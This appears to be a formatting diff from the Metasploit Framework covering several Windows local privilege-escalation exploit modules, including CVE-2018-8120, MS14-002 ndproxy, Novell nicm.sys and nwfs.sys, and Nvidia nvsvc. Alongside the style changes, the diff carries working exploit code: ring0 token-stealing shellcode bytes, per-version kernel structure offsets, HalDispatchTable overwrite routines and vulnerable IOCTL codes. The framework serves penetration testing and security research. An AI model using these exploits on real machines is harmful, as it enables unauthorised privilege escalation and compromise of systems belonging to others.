-    },
-    'License'         => MSF_LICENSE,
-    'Author'          => [
-        'unamer', # Exploit PoC
-        'bigric3', # Analysis and exploit
-        'Anton Cherepanov', # Vulnerability discovery
-        'Dhiraj Mishra <dhiraj@notsosecure.com>' # Metasploit
-      ],
-    'Platform'        => 'win',
-    'SessionTypes'    => [ 'meterpreter' ],
-    'DefaultOptions'  => {
-        'EXITFUNC'    => 'thread'
-      },
-    'Targets'         => [
-        [ 'Automatic', {} ],
-        [ 'Windows 7 x64', { 'Arch' => ARCH_X64 } ],
-        [ 'Windows 7 x86', { 'Arch' => ARCH_X86 } ]
-      ],
-    'Payload'         => {
-        'Space'       => 4096,
-        'DisableNops' => true
-      },
-    'References'      => [
-        ['BID', '104034'],
-        ['CVE', '2018-8120'],
-        ['URL', 'https://github.com/unamer/CVE-2018-8120'],
-        ['URL', 'https://github.com/bigric3/cve-2018-8120'],
-        ['URL', 'http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html'],
-        ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120']
-      ],
-    'DisclosureDate'  => '2018-05-09',
-    'DefaultTarget'   => 0
-    ))
+          This module is tested against windows 7 x86, windows 7 x64 and windows server 2008 R2 standard x64.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'unamer', # Exploit PoC
+          'bigric3', # Analysis and exploit
+          'Anton Cherepanov', # Vulnerability discovery
+          'Dhiraj Mishra <dhiraj@notsosecure.com>' # Metasploit
+        ],
+        'Platform' => 'win',
+        'SessionTypes' => [ 'meterpreter' ],
+        'DefaultOptions' => {
+          'EXITFUNC' => 'thread'
+        },
+        'Targets' => [
+          [ 'Automatic', {} ],
+          [ 'Windows 7 x64', { 'Arch' => ARCH_X64 } ],
+          [ 'Windows 7 x86', { 'Arch' => ARCH_X86 } ]
+        ],
+        'Payload' => {
+          'Space' => 4096,
+          'DisableNops' => true
+        },
+        'References' => [
+          ['BID', '104034'],
+          ['CVE', '2018-8120'],
+          ['URL', 'https://github.com/unamer/CVE-2018-8120'],
+          ['URL', 'https://github.com/bigric3/cve-2018-8120'],
+          ['URL', 'http://bigric3.blogspot.com/2018/05/cve-2018-8120-analysis-and-exploit.html'],
+          ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8120']
+        ],
+        'DisclosureDate' => '2018-05-09',
+        'DefaultTarget' => 0
+      )
+    )
   end
 
   def assign_target
@@ -97,7 +99,7 @@ class MetasploitModule < Msf::Exploit::Local
     if sys_arch.name =~ /x86/
       return 'CVE-2018-8120x86.exe'
     else sys_arch.name =~ /x64/
-      return 'CVE-2018-8120x64.exe'
+         return 'CVE-2018-8120x64.exe'
     end
   end
 

--- a/modules/exploits/windows/local/ms_ndproxy.rb
+++ b/modules/exploits/windows/local/ms_ndproxy.rb
@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Exploit::Local
   Rank = AverageRanking
 
@@ -13,79 +12,81 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Windows::Process
 
   def initialize(info = {})
-    super(update_info(info, {
-      'Name'            => 'MS14-002 Microsoft Windows ndproxy.sys Local Privilege Escalation',
-      'Description'     => %q(
-        This module exploits a flaw in the ndproxy.sys driver on Windows XP SP3 and Windows 2003
-        SP2 systems, exploited in the wild in November, 2013. The vulnerability exists while
-        processing an IO Control Code 0x8fff23c8 or 0x8fff23cc, where user provided input is used
-        to access an array unsafely, and the value is used to perform a call, leading to a NULL
-        pointer dereference which is exploitable on both Windows XP and Windows 2003 systems. This
-        module has been tested successfully on Windows XP SP3 and Windows 2003 SP2. In order to
-        work the service "Routing and Remote Access" must be running on the target system.
-      ),
-      'License'         => MSF_LICENSE,
-      'Author'          =>
-        [
-          'Unknown', # Vulnerability discovery
-          'ryujin', # python PoC
-          'Shahin Ramezany', # C PoC
-          'juan vazquez' # MSF module
-        ],
-      'Arch'            => ARCH_X86,
-      'Platform'        => 'win',
-      'Payload'         =>
+    super(
+      update_info(
+        info,
         {
-          'Space'       => 4096,
-          'DisableNops' => true
-        },
-      'SessionTypes'    => ['meterpreter'],
-      'DefaultOptions'  =>
-        {
-          'EXITFUNC'    => 'thread'
-        },
-      'Targets'         =>
-        [
-          ['Automatic', {}],
-          ['Windows XP SP3',
-            {
-              'HaliQuerySystemInfo' => 0x16bba, # Stable over Windows XP SP3 updates
-              '_KPROCESS' => "\x44", # Offset to _KPROCESS from a _ETHREAD struct
-              '_TOKEN' => "\xc8",    # Offset to TOKEN from the _EPROCESS struct
-              '_UPID' => "\x84",     # Offset to UniqueProcessId FROM the _EPROCESS struct
-              '_APLINKS' => "\x88"   # Offset to ActiveProcessLinks _EPROCESS struct
-            }
+          'Name' => 'MS14-002 Microsoft Windows ndproxy.sys Local Privilege Escalation',
+          'Description' => %q{
+            This module exploits a flaw in the ndproxy.sys driver on Windows XP SP3 and Windows 2003
+            SP2 systems, exploited in the wild in November, 2013. The vulnerability exists while
+            processing an IO Control Code 0x8fff23c8 or 0x8fff23cc, where user provided input is used
+            to access an array unsafely, and the value is used to perform a call, leading to a NULL
+            pointer dereference which is exploitable on both Windows XP and Windows 2003 systems. This
+            module has been tested successfully on Windows XP SP3 and Windows 2003 SP2. In order to
+            work the service "Routing and Remote Access" must be running on the target system.
+          },
+          'License' => MSF_LICENSE,
+          'Author' => [
+            'Unknown', # Vulnerability discovery
+            'ryujin', # python PoC
+            'Shahin Ramezany', # C PoC
+            'juan vazquez' # MSF module
           ],
-          ['Windows Server 2003 SP2',
-            {
-              'HaliQuerySystemInfo' => 0x1fa1e,
-              '_KPROCESS' => "\x38",
-              '_TOKEN' => "\xd8",
-              '_UPID' => "\x94",
-              '_APLINKS' => "\x98"
-            }
-          ]
-        ],
-      'References'      =>
-        [
-          %w(CVE 2013-5065),
-          %w(MSB MS14-002),
-          %w(OSVDB 100368),
-          %w(BID 63971),
-          %w(EDB 30014),
-          %w(URL http://labs.portcullis.co.uk/blog/cve-2013-5065-ndproxy-array-indexing-error-unpatched-vulnerability/),
-          %w(URL http://technet.microsoft.com/en-us/security/advisory/2914486),
-          %w(URL http://www.secniu.com/blog/?p=53),
-          %w(URL http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html),
-          %w(URL http://blog.spiderlabs.com/2013/12/the-kernel-is-calling-a-zeroday-pointer-cve-2013-5065-ring-ring.html)
-        ],
-      'DisclosureDate'  => '2013-11-27',
-      'DefaultTarget'   => 0
-    }))
+          'Arch' => ARCH_X86,
+          'Platform' => 'win',
+          'Payload' => {
+            'Space' => 4096,
+            'DisableNops' => true
+          },
+          'SessionTypes' => ['meterpreter'],
+          'DefaultOptions' => {
+            'EXITFUNC' => 'thread'
+          },
+          'Targets' => [
+            ['Automatic', {}],
+            [
+              'Windows XP SP3',
+              {
+                'HaliQuerySystemInfo' => 0x16bba, # Stable over Windows XP SP3 updates
+                '_KPROCESS' => "\x44", # Offset to _KPROCESS from a _ETHREAD struct
+                '_TOKEN' => "\xc8",    # Offset to TOKEN from the _EPROCESS struct
+                '_UPID' => "\x84",     # Offset to UniqueProcessId FROM the _EPROCESS struct
+                '_APLINKS' => "\x88"   # Offset to ActiveProcessLinks _EPROCESS struct
+              }
+            ],
+            [
+              'Windows Server 2003 SP2',
+              {
+                'HaliQuerySystemInfo' => 0x1fa1e,
+                '_KPROCESS' => "\x38",
+                '_TOKEN' => "\xd8",
+                '_UPID' => "\x94",
+                '_APLINKS' => "\x98"
+              }
+            ]
+          ],
+          'References' => [
+            %w(CVE 2013-5065),
+            %w(MSB MS14-002),
+            %w(OSVDB 100368),
+            %w(BID 63971),
+            %w(EDB 30014),
+            %w(URL http://labs.portcullis.co.uk/blog/cve-2013-5065-ndproxy-array-indexing-error-unpatched-vulnerability/),
+            %w(URL http://technet.microsoft.com/en-us/security/advisory/2914486),
+            %w(URL http://www.secniu.com/blog/?p=53),
+            %w(URL http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html),
+            %w(URL http://blog.spiderlabs.com/2013/12/the-kernel-is-calling-a-zeroday-pointer-cve-2013-5065-ring-ring.html)
+          ],
+          'DisclosureDate' => '2013-11-27',
+          'DefaultTarget' => 0
+        }
+      )
+    )
   end
 
   def ring0_shellcode(t)
-    restore_ptrs =  "\x31\xc0"                                                # xor eax, eax
+    restore_ptrs = "\x31\xc0" # xor eax, eax
     restore_ptrs << "\xb8" + [@addresses['HaliQuerySystemInfo']].pack('V')  # mov eax, offset hal!HaliQuerySystemInformation
     restore_ptrs << "\xa3" + [@addresses['halDispatchTable'] + 4].pack('V') # mov dword ptr [nt!HalDispatchTable+0x4], eax
 
@@ -134,6 +135,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     hal_dispatch_table = find_haldispatchtable
     return nil if hal_dispatch_table.nil?
+
     addresses['halDispatchTable'] = hal_dispatch_table
     vprint_good("HalDispatchTable found at 0x#{addresses['halDispatchTable'].to_s(16)}")
 

--- a/modules/exploits/windows/local/novell_client_nicm.rb
+++ b/modules/exploits/windows/local/novell_client_nicm.rb
@@ -9,63 +9,62 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Process
 
-  def initialize(info={})
-    super(update_info(info, {
-      'Name'           => 'Novell Client 2 SP3 nicm.sys Local Privilege Escalation',
-      'Description'    => %q{
-        This module exploits a flaw in the nicm.sys driver to execute arbitrary code in
-        kernel space. The vulnerability occurs while handling ioctl requests with code
-        0x143B6B, where a user provided pointer is used as function pointer. The module
-        has been tested successfully on Windows 7 SP1 with Novell Client 2 SP3.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          'Unknown', # Vulnerability discovery
-          'juan vazquez' # MSF module
-        ],
-      'Arch'           => ARCH_X86,
-      'Platform'       => 'win',
-      'SessionTypes'   => [ 'meterpreter' ],
-      'DefaultOptions' =>
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
         {
-          'EXITFUNC' => 'thread',
-        },
-      'Targets'        =>
-        [
-          # Tested with nicm.sys Version v3.1.5 Novell XTier Novell XTCOM Services Driver for Windows
-          # as installed with Novell Client 2 SP3 for Windows 7
-          [ 'Automatic', { } ],
-          [ 'Windows 7 SP1',
-            {
-              'HaliQuerySystemInfo' => 0x16bba, # Stable over Windows XP SP3 updates
-              '_KPROCESS'           => "\x50",  # Offset to _KPROCESS from a _ETHREAD struct
-              '_TOKEN'              => "\xf8",  # Offset to TOKEN from the _EPROCESS struct
-              '_UPID'               => "\xb4",  # Offset to UniqueProcessId FROM the _EPROCESS struct
-              '_APLINKS'            => "\xb8"   # Offset to ActiveProcessLinks _EPROCESS struct
-            }
-          ]
-        ],
-      'Payload'        =>
-        {
-          'Space'       => 4096,
-          'DisableNops' => true
-        },
-      'References'     =>
-        [
-          [ 'CVE', '2013-3956' ],
-          [ 'OSVDB', '93718' ],
-          [ 'URL', 'http://www.novell.com/support/kb/doc.php?id=7012497' ],
-          [ 'URL', 'http://pastebin.com/GB4iiEwR' ]
-        ],
-      'DisclosureDate' => '2013-05-22',
-      'DefaultTarget'  => 0
-    }))
-
+          'Name' => 'Novell Client 2 SP3 nicm.sys Local Privilege Escalation',
+          'Description' => %q{
+            This module exploits a flaw in the nicm.sys driver to execute arbitrary code in
+            kernel space. The vulnerability occurs while handling ioctl requests with code
+            0x143B6B, where a user provided pointer is used as function pointer. The module
+            has been tested successfully on Windows 7 SP1 with Novell Client 2 SP3.
+          },
+          'License' => MSF_LICENSE,
+          'Author' => [
+            'Unknown', # Vulnerability discovery
+            'juan vazquez' # MSF module
+          ],
+          'Arch' => ARCH_X86,
+          'Platform' => 'win',
+          'SessionTypes' => [ 'meterpreter' ],
+          'DefaultOptions' => {
+            'EXITFUNC' => 'thread',
+          },
+          'Targets' => [
+            # Tested with nicm.sys Version v3.1.5 Novell XTier Novell XTCOM Services Driver for Windows
+            # as installed with Novell Client 2 SP3 for Windows 7
+            [ 'Automatic', {} ],
+            [
+              'Windows 7 SP1',
+              {
+                'HaliQuerySystemInfo' => 0x16bba, # Stable over Windows XP SP3 updates
+                '_KPROCESS' => "\x50", # Offset to _KPROCESS from a _ETHREAD struct
+                '_TOKEN' => "\xf8", # Offset to TOKEN from the _EPROCESS struct
+                '_UPID' => "\xb4", # Offset to UniqueProcessId FROM the _EPROCESS struct
+                '_APLINKS' => "\xb8" # Offset to ActiveProcessLinks _EPROCESS struct
+              }
+            ]
+          ],
+          'Payload' => {
+            'Space' => 4096,
+            'DisableNops' => true
+          },
+          'References' => [
+            [ 'CVE', '2013-3956' ],
+            [ 'OSVDB', '93718' ],
+            [ 'URL', 'http://www.novell.com/support/kb/doc.php?id=7012497' ],
+            [ 'URL', 'http://pastebin.com/GB4iiEwR' ]
+          ],
+          'DisclosureDate' => '2013-05-22',
+          'DefaultTarget' => 0
+        }
+      )
+    )
   end
 
   def open_device(dev)
-
     invalid_handle_value = 0xFFFFFFFF
 
     r = session.railgun.kernel32.CreateFileA(dev, "GENERIC_READ", 0x3, nil, "OPEN_EXISTING", "FILE_ATTRIBUTE_READONLY", 0)
@@ -80,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def ring0_shellcode(t)
-    tokenstealing =  "\x52"                                                   # push edx                         # Save edx on the stack
+    tokenstealing = "\x52" # push edx                         # Save edx on the stack
     tokenstealing << "\x53"                                                   # push ebx                         # Save ebx on the stack
     tokenstealing << "\x33\xc0"                                               # xor eax, eax                     # eax = 0
     tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00"                           # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD
@@ -101,9 +100,7 @@ class MetasploitModule < Msf::Exploit::Local
     return tokenstealing
   end
 
-
   def allocate_memory(proc, address, length)
-
     result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("V"), nil, [ length ].pack("V"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
 
     if not result["BaseAddress"] or result["BaseAddress"].empty?
@@ -125,7 +122,7 @@ class MetasploitModule < Msf::Exploit::Local
     return my_address
   end
 
-  def junk(n=4)
+  def junk(n = 4)
     return rand_text_alpha(n).unpack("V").first
   end
 
@@ -134,6 +131,7 @@ class MetasploitModule < Msf::Exploit::Local
     if handle.nil?
       return Exploit::CheckCode::Safe
     end
+
     session.railgun.kernel32.CloseHandle(handle)
     return Exploit::CheckCode::Detected
   end
@@ -185,7 +183,7 @@ class MetasploitModule < Msf::Exploit::Local
     # .text:000121A9 push    ecx
     # .text:000121AA push    eax
     # .text:000121AB call    dword ptr [edx+0Ch]
-    kernel_stager =  [
+    kernel_stager = [
       stager_address + 0x14, # stager_address
       junk,
       junk,
@@ -208,7 +206,6 @@ class MetasploitModule < Msf::Exploit::Local
     else
       vprint_good("Contents successfully written to 0x#{stager_address.to_s(16)}")
     end
-
 
     print_status("Triggering the vulnerability to execute the Kernel Handler")
     magic_ioctl = 0x143B6B # Vulnerable IOCTL

--- a/modules/exploits/windows/local/novell_client_nwfs.rb
+++ b/modules/exploits/windows/local/novell_client_nwfs.rb
@@ -9,58 +9,58 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Process
 
-  def initialize(info={})
-    super(update_info(info, {
-      'Name'          => 'Novell Client 4.91 SP4 nwfs.sys Local Privilege Escalation',
-      'Description'    => %q{
-        This module exploits a flaw in the nwfs.sys driver to overwrite data in kernel
-        space. The corruption occurs while handling ioctl requests with code 0x1438BB,
-        where a 0x00000009 dword is written to an arbitrary address. An entry within the
-        HalDispatchTable is overwritten in order to execute arbitrary code when
-        NtQueryIntervalProfile is called. The module has been tested successfully on
-        Windows XP SP3 with Novell Client 4.91 SP4.
-      },
-      'License'       => MSF_LICENSE,
-      'Author'        =>
-        [
-          'Ruben Santamarta', # Vulnerability discovery and PoC
-          'juan vazquez' # MSF module
-        ],
-      'Arch'          => ARCH_X86,
-      'Platform'      => 'win',
-      'SessionTypes'  => [ 'meterpreter' ],
-      'DefaultOptions' =>
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
         {
-          'EXITFUNC' => 'thread',
-        },
-      'Targets'       =>
-        [
-          # Tested with nwfs.sys 4.91.4.7 as installed with Novell Client 4.91 SP4
-          [ 'Automatic', { } ],
-          [ 'Windows XP SP3',
-            {
-              'HaliQuerySystemInfo' => 0x16bba, # Stable over Windows XP SP3 updates
-              '_KPROCESS' => "\x44", # Offset to _KPROCESS from a _ETHREAD struct
-              '_TOKEN' => "\xc8",    # Offset to TOKEN from the _EPROCESS struct
-              '_UPID' => "\x84",     # Offset to UniqueProcessId FROM the _EPROCESS struct
-              '_APLINKS' => "\x88"   # Offset to ActiveProcessLinks _EPROCESS struct
-            }
-          ]
-        ],
-      'References'    =>
-        [
-          [ 'CVE', '2008-3158' ],
-          [ 'OSVDB', '46578' ],
-          [ 'BID', '30001' ]
-        ],
-      'DisclosureDate'=> '2008-06-26',
-      'DefaultTarget' => 0
-    }))
-
+          'Name' => 'Novell Client 4.91 SP4 nwfs.sys Local Privilege Escalation',
+          'Description' => %q{
+            This module exploits a flaw in the nwfs.sys driver to overwrite data in kernel
+            space. The corruption occurs while handling ioctl requests with code 0x1438BB,
+            where a 0x00000009 dword is written to an arbitrary address. An entry within the
+            HalDispatchTable is overwritten in order to execute arbitrary code when
+            NtQueryIntervalProfile is called. The module has been tested successfully on
+            Windows XP SP3 with Novell Client 4.91 SP4.
+          },
+          'License' => MSF_LICENSE,
+          'Author' => [
+            'Ruben Santamarta', # Vulnerability discovery and PoC
+            'juan vazquez' # MSF module
+          ],
+          'Arch' => ARCH_X86,
+          'Platform' => 'win',
+          'SessionTypes' => [ 'meterpreter' ],
+          'DefaultOptions' => {
+            'EXITFUNC' => 'thread',
+          },
+          'Targets' => [
+            # Tested with nwfs.sys 4.91.4.7 as installed with Novell Client 4.91 SP4
+            [ 'Automatic', {} ],
+            [
+              'Windows XP SP3',
+              {
+                'HaliQuerySystemInfo' => 0x16bba, # Stable over Windows XP SP3 updates
+                '_KPROCESS' => "\x44", # Offset to _KPROCESS from a _ETHREAD struct
+                '_TOKEN' => "\xc8",    # Offset to TOKEN from the _EPROCESS struct
+                '_UPID' => "\x84",     # Offset to UniqueProcessId FROM the _EPROCESS struct
+                '_APLINKS' => "\x88"   # Offset to ActiveProcessLinks _EPROCESS struct
+              }
+            ]
+          ],
+          'References' => [
+            [ 'CVE', '2008-3158' ],
+            [ 'OSVDB', '46578' ],
+            [ 'BID', '30001' ]
+          ],
+          'DisclosureDate' => '2008-06-26',
+          'DefaultTarget' => 0
+        }
+      )
+    )
   end
 
   def open_device(dev)
-
     invalid_handle_value = 0xFFFFFFFF
 
     r = session.railgun.kernel32.CreateFileA(dev, "GENERIC_READ", 0x3, nil, "OPEN_EXISTING", "FILE_ATTRIBUTE_READONLY", 0)
@@ -94,11 +94,11 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def ring0_shellcode(t)
-    restore_ptrs =  "\x31\xc0"                                                # xor eax, eax
+    restore_ptrs = "\x31\xc0" # xor eax, eax
     restore_ptrs << "\xb8" + [ @addresses["HaliQuerySystemInfo"] ].pack('V')  # mov eax, offset hal!HaliQuerySystemInformation
     restore_ptrs << "\xa3" + [ @addresses["halDispatchTable"] + 4 ].pack('V') # mov dword ptr [nt!HalDispatchTable+0x4], eax
 
-    tokenstealing =  "\x52"                                                   # push edx                         # Save edx on the stack
+    tokenstealing = "\x52" # push edx                         # Save edx on the stack
     tokenstealing << "\x53"                                                   # push ebx                         # Save ebx on the stack
     tokenstealing << "\x33\xc0"                                               # xor eax, eax                     # eax = 0
     tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00"                           # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD
@@ -121,7 +121,6 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def fill_memory(proc, address, length, content)
-
     result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
 
     if not proc.memory.writable?(address)
@@ -163,7 +162,6 @@ class MetasploitModule < Msf::Exploit::Local
     end
     vprint_good("Kernel handle acquired")
 
-
     vprint_status("Disclosing the HalDispatchTable...")
     hal_dispatch_table = session.railgun.kernel32.GetProcAddress(kernel32_handle, "HalDispatchTable")
     hal_dispatch_table = hal_dispatch_table['return']
@@ -191,7 +189,6 @@ class MetasploitModule < Msf::Exploit::Local
     vprint_good("HaliQuerySystemInfo Address disclosed at 0x#{addresses["HaliQuerySystemInfo"].to_s(16)}")
     return addresses
   end
-
 
   def exploit
     if sysinfo["Architecture"] == ARCH_X64
@@ -231,7 +228,6 @@ class MetasploitModule < Msf::Exploit::Local
     else
       print_good("Addresses successfully disclosed.")
     end
-
 
     print_status("Storing the kernel stager on memory...")
     this_proc = session.sys.process.open
@@ -282,7 +278,6 @@ class MetasploitModule < Msf::Exploit::Local
     else
       fail_with(Failure::Unknown, "Error while executing the payload")
     end
-
   end
 end
 

--- a/modules/exploits/windows/local/nscp_pe.rb
+++ b/modules/exploits/windows/local/nscp_pe.rb
@@ -22,38 +22,35 @@ class MetasploitModule < Msf::Exploit::Local
           You must also know where the NSClient config file is, as it is used to read the admin password which is stored in clear text.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [               # This module is kind of mix of the two following POCs :
-            'kindredsec', # POC on www.exploit-db.com
-            'BZYO',       # POC on www.exploit-db.com
-            'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
-          ],
-        'References' =>
-          [
-            ['EDB', '48360'],
-            ['EDB', '46802']
-          ],
+        # This module is kind of mix of the two following POCs :
+        'Author' => [ # This module is kind of mix of the two following POCs :
+          'kindredsec', # POC on www.exploit-db.com
+          'BZYO', # POC on www.exploit-db.com
+          'Yann Castel (yann.castel[at]orange.com)' # Metasploit module
+        ],
+        'References' => [
+          ['EDB', '48360'],
+          ['EDB', '46802']
+        ],
         'Platform' => %w[windows],
         'Arch' => [ARCH_X64],
-        'Targets' =>
+        'Targets' => [
           [
-            [
-              'Windows',
-              {
-                'Arch' => [ARCH_X86, ARCH_X64],
-                'Type' => :windows_powershell
-              }
-            ]
-          ],
+            'Windows',
+            {
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :windows_powershell
+            }
+          ]
+        ],
         'Privileged' => true,
         'DisclosureDate' => '2020-10-20',
         'DefaultTarget' => 0,
-        'Notes' =>
-          {
-            'Stability' => [ CRASH_SAFE ],
-            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
-            'Reliability' => [ REPEATABLE_SESSION ]
-          },
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+          'Reliability' => [ REPEATABLE_SESSION ]
+        },
         'DefaultOptions' => { 'SSL' => true, 'RPORT' => 8443 }
       )
     )

--- a/modules/exploits/windows/local/ntusermndragover.rb
+++ b/modules/exploits/windows/local/ntusermndragover.rb
@@ -33,32 +33,28 @@ class MetasploitModule < Msf::Exploit::Local
             of Windows, such as Windows Server 2008.
           },
           'License' => MSF_LICENSE,
-          'Author' =>
-              [
-                'Clément Lecigne', # discovery
-                'Grant Willcox', # exploit
-                'timwr' # msf module
-              ],
+          'Author' => [
+            'Clément Lecigne', # discovery
+            'Grant Willcox', # exploit
+            'timwr' # msf module
+          ],
           'Platform' => 'win',
           'SessionTypes' => ['meterpreter'],
-          'Targets' =>
-              [
-                ['Windows 7 x86', { 'Arch' => ARCH_X86 }]
-              ],
-          'Notes' =>
-            {
-              'Stability' => [CRASH_OS_RESTARTS],
-              'SideEffects' => [SCREEN_EFFECTS],
-              'Reliability' => [REPEATABLE_SESSION]
-            },
-          'References' =>
-              [
-                ['CVE', '2019-0808'],
-                ['URL', 'https://github.com/exodusintel/CVE-2019-0808'],
-                ['URL', 'https://github.com/ze0r/cve-2019-0808-poc'],
-                ['URL', 'http://blogs.360.cn/post/RootCause_CVE-2019-0808_EN.html'],
-                ['URL', 'https://blog.exodusintel.com/2019/05/17/windows-within-windows/'],
-              ],
+          'Targets' => [
+            ['Windows 7 x86', { 'Arch' => ARCH_X86 }]
+          ],
+          'Notes' => {
+            'Stability' => [CRASH_OS_RESTARTS],
+            'SideEffects' => [SCREEN_EFFECTS],
+            'Reliability' => [REPEATABLE_SESSION]
+          },
+          'References' => [
+            ['CVE', '2019-0808'],
+            ['URL', 'https://github.com/exodusintel/CVE-2019-0808'],
+            ['URL', 'https://github.com/ze0r/cve-2019-0808-poc'],
+            ['URL', 'http://blogs.360.cn/post/RootCause_CVE-2019-0808_EN.html'],
+            ['URL', 'https://blog.exodusintel.com/2019/05/17/windows-within-windows/'],
+          ],
           'DisclosureDate' => '2019-03-12',
           'DefaultTarget' => 0
         )

--- a/modules/exploits/windows/local/nvidia_nvsvc.rb
+++ b/modules/exploits/windows/local/nvidia_nvsvc.rb
@@ -12,51 +12,50 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Windows::ReflectiveDLLInjection
   include Msf::Post::Windows::Services
 
-  def initialize(info={})
-    super(update_info(info, {
-      'Name'            => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation',
-      'Description'     => %q{
-        The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user to
-        interact with the service. It contains a stacked based buffer overflow as a result
-        of a memmove operation. Note the slight spelling differences: the executable is 'nvvsvc.exe',
-        the service name is 'nvsvc', and the named pipe is 'nsvr'.
-
-        This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012.
-        It has been tested on Windows 7 64-bit against nvvsvc.exe dated Dec 1 2012.
-      },
-      'License'         => MSF_LICENSE,
-      'Author'          =>
-        [
-          'Peter Wintersmith', # Original exploit
-          'Ben Campbell',   # Metasploit integration
-        ],
-      'Arch'            => ARCH_X64,
-      'Platform'        => 'win',
-      'SessionTypes'    => [ 'meterpreter' ],
-      'DefaultOptions'  =>
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
         {
-          'EXITFUNC'    => 'thread',
-        },
-      'Targets'         =>
-        [
-          [ 'Windows x64', { } ]
-        ],
-      'Payload'         =>
-        {
-          'Space'       => 2048,
-          'DisableNops' => true,
-          'BadChars'    => "\x00"
-        },
-      'References'      =>
-        [
-          [ 'CVE', '2013-0109' ],
-          [ 'OSVDB', '88745' ],
-          [ 'URL', 'http://nvidia.custhelp.com/app/answers/detail/a_id/3288' ],
-        ],
-      'DisclosureDate' => '2012-12-25',
-      'DefaultTarget'  => 0
-    }))
+          'Name' => 'Nvidia (nvsvc) Display Driver Service Local Privilege Escalation',
+          'Description' => %q{
+            The named pipe, \pipe\nsvr, has a NULL DACL allowing any authenticated user to
+            interact with the service. It contains a stacked based buffer overflow as a result
+            of a memmove operation. Note the slight spelling differences: the executable is 'nvvsvc.exe',
+            the service name is 'nvsvc', and the named pipe is 'nsvr'.
 
+            This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012.
+            It has been tested on Windows 7 64-bit against nvvsvc.exe dated Dec 1 2012.
+          },
+          'License' => MSF_LICENSE,
+          'Author' => [
+            'Peter Wintersmith', # Original exploit
+            'Ben Campbell', # Metasploit integration
+          ],
+          'Arch' => ARCH_X64,
+          'Platform' => 'win',
+          'SessionTypes' => [ 'meterpreter' ],
+          'DefaultOptions' => {
+            'EXITFUNC' => 'thread',
+          },
+          'Targets' => [
+            [ 'Windows x64', {} ]
+          ],
+          'Payload' => {
+            'Space' => 2048,
+            'DisableNops' => true,
+            'BadChars' => "\x00"
+          },
+          'References' => [
+            [ 'CVE', '2013-0109' ],
+            [ 'OSVDB', '88745' ],
+            [ 'URL', 'http://nvidia.custhelp.com/app/answers/detail/a_id/3288' ],
+          ],
+          'DisclosureDate' => '2012-12-25',
+          'DefaultTarget' => 0
+        }
+      )
+    )
   end
 
   def check
@@ -84,10 +83,10 @@ class MetasploitModule < Msf::Exploit::Local
         end
 
         if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
-          path = svc[:path].gsub('"','').strip
-          path.gsub!("system32","sysnative")
+          path = svc[:path].gsub('"', '').strip
+          path.gsub!("system32", "sysnative")
         else
-          path = svc[:path].gsub('"','').strip
+          path = svc[:path].gsub('"', '').strip
         end
 
         begin
@@ -145,4 +144,3 @@ class MetasploitModule < Msf::Exploit::Local
     print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.")
   end
 end
-

--- a/modules/exploits/windows/local/payload_inject.rb
+++ b/modules/exploits/windows/local/payload_inject.rb
@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking
 
@@ -12,27 +11,29 @@ class MetasploitModule < Msf::Exploit::Local
 
   moved_from 'post/windows/manage/payload_inject'
 
-  def initialize(info={})
-    super( update_info( info,
-      'Name'            => 'Windows Manage Memory Payload Injection',
-      'Description'     => %q{
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Manage Memory Payload Injection',
+        'Description' => %q{
           This module will inject a payload into memory of a process.  If a payload
-        isn't selected, then it'll default to a reverse x86 TCP meterpreter.  If the PID
-        datastore option isn't specified, then it'll inject into notepad.exe instead.
-      },
-      'License'         => MSF_LICENSE,
-      'Author'          =>
-        [
